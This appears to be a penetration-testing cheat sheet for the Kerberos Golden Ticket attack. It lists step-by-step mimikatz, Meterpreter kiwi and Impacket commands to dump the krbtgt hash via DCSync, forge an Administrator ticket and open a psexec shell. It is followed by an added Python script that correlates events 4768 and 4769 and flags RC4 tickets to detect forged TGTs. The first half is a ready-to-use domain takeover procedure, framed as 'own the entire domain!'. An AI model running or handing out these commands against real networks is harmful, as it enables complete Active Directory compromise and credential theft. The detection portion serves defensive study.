# Golden Ticket

## GOLDEN TICKET

### Dump krbtgt hash to own the entire domain!

**1)**

```
mimikatz.exe
```

**2)**

```
privilege::debug
```

**3)**

```
lsadump::lsa /inject /name:krbtgt
```

**4)**

```
lsadump::lsa /patch
```

**5)**

```
lsadump::trust /patch
```

**6)**

```
lsadump::dcsync /user:krbtgt
```

**7)**

```
kerberos::purge
```

**8)**

```
kerberos::golden /user:Administrator /domain:domain.local /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /id:<RID: 500 for Administrator, e.g. 1103 for a service account>
```

**9)**

```
kerberos::tgt
```

**10)**

```
misc::cmd
```

### Alternate method: Meterpreter shell

#### Get information for golden ticket

**1)**

```
dcsync_ntlm krbtgt
```

**2)**

```
dcsync krbtgt
```

#### Forge a Golden Ticket

**3)**

```
load kiwi
```

**4)**

```
golden_ticket_create -d DOMAIN_NAME -k NTLM_HASH_OF_KRBTGT -s SID -u Administrator
```

**5)**

```
kerberos_ticket_purge
```

**6)**

```
kerberos_ticket_use /root/Downloads/Administrator.tck
```

**7)**

```
kerberos_ticket_list
```

#### Authenticate with Impacket psexec (Linux)

**8)**

```
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
```

### Alternate method: Impacket ticketer

**1)**

```
python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
```

**2)**

```
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
```

**3)**

```
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
```

## Golden Ticket: command reference

| Command                                                                                                              | Description                                                                                                                    |
| -------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ |
| `lsadump::dcsync /domain:eagle.local /user:krbtgt`                                                                   | Command used in `mimikatz` to DCSync and dump the `krbtgt` password hash                                                       |
| `Get-DomainSID`                                                                                                      | Cmdlet from `PowerView` used to obtain the SID value of the domain.                                                            |
| `golden /domain:eagle.local /sid:<domain sid> /rc4:<rc4 hash> /user:Administrator /id:500 /renewmax:7 /endin:8 /ptt` | Command used in `mimikatz` to forge a golden ticket for the `Administrator` account and pass the ticket to the current session |
| `klist`                                                                                                              | Built-in Windows command that lists the Kerberos tickets cached in the current session, used to confirm the ticket was injected |
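Every command above produces a TGT that no domain controller ever issued. On the defender's side that is the signal: a legitimate logon writes a 4768 (TGT requested) event on some DC before any 4769 (service ticket requested) appears for that account, whereas a forged TGT shows up only as 4769 events. The Python script below is an added example, not code from the original page or from any of the tools it lists; it runs that correlation over a constructed batch of 4768/4769 records (the `KerberosEvent` class, the sample accounts and the `eagle.local` hostnames are assumptions for the example) and also flags, as a secondary heuristic, service-ticket requests that used RC4 in a domain where AES is expected, since a ticket forged from the krbtgt NTLM hash is RC4-keyed.

```python
# Added example: correlate Kerberos events 4768 and 4769 to surface TGTs that
# no DC issued. The event records below are constructed for the example; in
# practice they must be collected from EVERY domain controller, because the
# 4768 may sit on a different DC than the 4769 that used the ticket.
from dataclasses import dataclass
from datetime import datetime, timedelta

# Values written to the TicketEncryptionType field of 4768/4769
RC4_HMAC = 0x17
AES128_CTS = 0x11
AES256_CTS = 0x12

NO_TGT = "no TGT (4768) issued for this account within the TGT lifetime"
RC4_WHERE_AES = "RC4 ticket encryption where AES is expected"


@dataclass
class KerberosEvent:
    event_id: int        # 4768 = TGT requested, 4769 = service ticket requested
    time: datetime       # event timestamp (assume all DCs are clock-synced)
    account: str         # TargetUserName; 4769 carries user@REALM, 4768 only user
    client_ip: str       # IpAddress field
    enc_type: int        # TicketEncryptionType field
    service: str = ""    # ServiceName field, 4769 only


def normalise(account: str) -> str:
    """Strip the realm suffix so 4768 and 4769 names compare equal."""
    return account.split("@", 1)[0].lower()


def find_golden_ticket_indicators(events, tgt_lifetime=timedelta(hours=10),
                                  expect_aes=True):
    """Return [(event, reason)] for 4769 events that look like forged TGTs.

    tgt_lifetime is the domain's maximum TGT lifetime (10 hours by default):
    any 4769 must be preceded by a 4768 for the same account within that
    window, because a TGT older than that could not still be valid.
    """
    tgt_times = {}
    for e in events:
        if e.event_id == 4768:
            tgt_times.setdefault(normalise(e.account), []).append(e.time)

    findings = []
    for e in sorted(events, key=lambda ev: ev.time):
        if e.event_id != 4769:
            continue
        acct = normalise(e.account)
        issued_recently = any(e.time - tgt_lifetime <= t <= e.time
                              for t in tgt_times.get(acct, []))
        if not issued_recently:
            findings.append((e, NO_TGT))
        if expect_aes and e.enc_type == RC4_HMAC:
            findings.append((e, RC4_WHERE_AES))
    return findings


# Constructed sample: one normal logon, one stale TGT, one forged ticket
T0 = datetime(2024, 1, 15, 8, 0)
SAMPLE_EVENTS = [
    # alice: TGT issued, then a file-server ticket 30 minutes later (normal)
    KerberosEvent(4768, T0, "alice", "10.0.0.21", AES256_CTS),
    KerberosEvent(4769, T0 + timedelta(minutes=30), "alice@EAGLE.LOCAL",
                  "10.0.0.21", AES256_CTS, "cifs/fs01.eagle.local"),
    # bob: last TGT 20 hours ago, yet a service ticket is requested now
    KerberosEvent(4768, T0 - timedelta(hours=20), "bob", "10.0.0.22", AES256_CTS),
    KerberosEvent(4769, T0 + timedelta(hours=1), "bob@EAGLE.LOCAL",
                  "10.0.0.22", AES256_CTS, "cifs/fs01.eagle.local"),
    # Administrator: RC4 service ticket with no 4768 on any DC at all
    KerberosEvent(4769, T0 + timedelta(hours=2), "Administrator@EAGLE.LOCAL",
                  "10.0.0.99", RC4_HMAC, "cifs/dc01.eagle.local"),
]


def run_sample():
    """Run the correlation over the constructed events and return findings."""
    return find_golden_ticket_indicators(SAMPLE_EVENTS)


if __name__ == "__main__":
    for event, reason in run_sample():
        print(f"{event.time} {normalise(event.account):<14} {event.client_ip:<10} "
              f"{event.service:<24} {reason}")
```

On the constructed input this reports bob once (stale TGT) and Administrator twice (no TGT at all, plus RC4). The stale-TGT case is why the window matters: set `tgt_lifetime` to the value in the domain's Kerberos policy rather than trusting the default, and treat renewed TGTs as fresh issuance if your collection includes renewal events. The RC4 heuristic is only meaningful once the domain actually enforces AES for its accounts; in a mixed domain it will fire on legitimate traffic.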
